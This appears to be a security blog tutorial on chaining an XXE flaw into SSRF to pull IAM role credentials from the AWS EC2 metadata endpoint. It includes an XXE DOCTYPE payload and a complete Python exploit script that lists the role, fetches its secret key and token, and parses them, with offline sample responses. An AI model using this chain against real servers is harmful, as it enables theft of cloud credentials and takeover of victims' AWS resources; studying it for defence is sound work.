Retrieving IAM credentials of an EC2 instance using XXE and SSRF
Server-Side Request Forgery (SSRF): SSRF is an attack in which an attacker forces a vulnerable server to send attacker-controlled requests to third-party servers and/or to internal resources that the server can reach but the attacker cannot.
For more on SSRF and its exploitation, see my previous blog post:
XML External Entity (XXE): An XML External Entity attack targets an application that parses XML input with external entity resolution enabled. It often allows an attacker to read files on the application server's file system and to interact with any backend or external systems that the application itself can reach, and in some configurations it can be escalated to remote code execution.
For more on XXE, see my previous blog post:
How to escalate an XXE vulnerability into SSRF?
Exploiting this lets an attacker reach local infrastructure or the internal network from the vulnerable server itself, bypassing the WAF and network boundaries that sit in front of it, which can lead to sensitive information disclosure.
To perform SSRF through XXE, declare an external entity whose SYSTEM identifier is the URL we want to target, then reference that entity in an element whose value the application echoes back in its response. When the parser resolves the entity, the server fetches the URL, and the body it retrieved appears in the application's response in place of the entity reference.
<!DOCTYPE foo [ <!ENTITY id SYSTEM "http://localhost.com/"> ]>
In this XXE payload, id is an external entity; when the parser resolves it, the server makes an outbound HTTP request to the given URL, which can be pointed at internal infrastructure.
We have a server that is vulnerable to XXE, and the server can reach the internal network. Because the server is an EC2 instance, it can also reach the AWS instance metadata service (IMDS) at its default address, http://169.254.169.254/. We need to fetch the IAM role's credentials, including the secret access key, from the EC2 metadata endpoint.
Let's suppose the vulnerable EC2 instance is located at http://192.168.1.220.
The request below shows that the application accepts XML.
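The two-step chain described above (first list the role names under the default IMDSv1 credentials path, then fetch that role's credential document), written out as an added example; this is not code from the original post. The target endpoint http://192.168.1.220/api/upload and the echoed element name are assumptions about the vulnerable application, and the sample responses are constructed so the chain can be exercised offline.

```python
import json
import re
import urllib.request

# Default IMDSv1 path that lists the IAM role(s) attached to the instance;
# appending a role name returns that role's temporary credentials as JSON.
IMDS_CREDS_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Assumed target from the scenario: the vulnerable EC2 instance, plus an
# assumed endpoint and element that the application echoes back in its response.
TARGET = "http://192.168.1.220/api/upload"   # hypothetical endpoint
REFLECTED_ELEMENT = "name"                    # hypothetical echoed element


def build_xxe_payload(url, element=REFLECTED_ELEMENT, entity="xxe"):
    """Return an XML document whose external entity 'entity' points at 'url'.

    The entity is referenced inside <element>; if the application echoes that
    element back, the body fetched from 'url' appears in the response.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY {entity} SYSTEM "{url}"> ]>\n'
        f'<root><{element}>&{entity};</{element}></root>'
    )


def extract_reflected(body, element=REFLECTED_ELEMENT):
    """Pull the text the application echoed back inside <element>, or None."""
    m = re.search(rf"<{element}>(.*?)</{element}>", body, re.S)
    return m.group(1).strip() if m else None


def parse_role_credentials(text):
    """Parse the IMDS credential document and return the usable key material.

    IMDS returns JSON with Code, AccessKeyId, SecretAccessKey, Token and
    Expiration; all three key fields are needed to call AWS as the role.
    """
    doc = json.loads(text)
    if doc.get("Code") != "Success":
        raise ValueError(f"unexpected IMDS response code: {doc.get('Code')!r}")
    return {
        "AccessKeyId": doc["AccessKeyId"],
        "SecretAccessKey": doc["SecretAccessKey"],
        "Token": doc["Token"],
        "Expiration": doc.get("Expiration"),
    }


def send_xml(target, payload, timeout=10):
    """POST the XML payload to the target and return the response body (uses the network)."""
    req = urllib.request.Request(
        target, data=payload.encode(), method="POST",
        headers={"Content-Type": "application/xml"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def steal_role_credentials(target, fetch=send_xml):
    """List role names via XXE, then fetch the first role's credentials.

    'fetch' is injectable so the chain can run offline against canned responses.
    """
    roles = extract_reflected(fetch(target, build_xxe_payload(IMDS_CREDS_URL)))
    if not roles:
        raise RuntimeError("no role name reflected: entity not resolved or not echoed")
    role = roles.splitlines()[0].strip()
    creds_body = extract_reflected(fetch(target, build_xxe_payload(IMDS_CREDS_URL + role)))
    return role, parse_role_credentials(creds_body)


# Constructed sample responses (not real data) standing in for the vulnerable
# application so the chain can be exercised without a network.
SAMPLE_ROLE_LIST = "<root><name>ec2-web-role</name></root>"
SAMPLE_CREDS = (
    "<root><name>"
    '{"Code": "Success", "LastUpdated": "2023-01-01T00:00:00Z", "Type": "AWS-HMAC", '
    '"AccessKeyId": "ASIAEXAMPLEKEY", "SecretAccessKey": "exampleSecret", '
    '"Token": "exampleSessionToken", "Expiration": "2023-01-01T06:00:00Z"}'
    "</name></root>"
)


def fake_fetch(target, payload):
    """Offline stand-in for send_xml: answer based on which URL the payload targets."""
    if f'SYSTEM "{IMDS_CREDS_URL}"' in payload:
        return SAMPLE_ROLE_LIST
    return SAMPLE_CREDS


if __name__ == "__main__":
    role, creds = steal_role_credentials(TARGET, fetch=fake_fetch)
    print(role, creds["AccessKeyId"])
```

Two practical caveats: the reflected element must carry the fetched body verbatim, which works for the JSON credential document because it contains no characters the XML parser treats specially; and if the instance enforces IMDSv2, the plain GET issued by the entity resolver is rejected, because a session token must first be obtained with a PUT request that an XML parser cannot make.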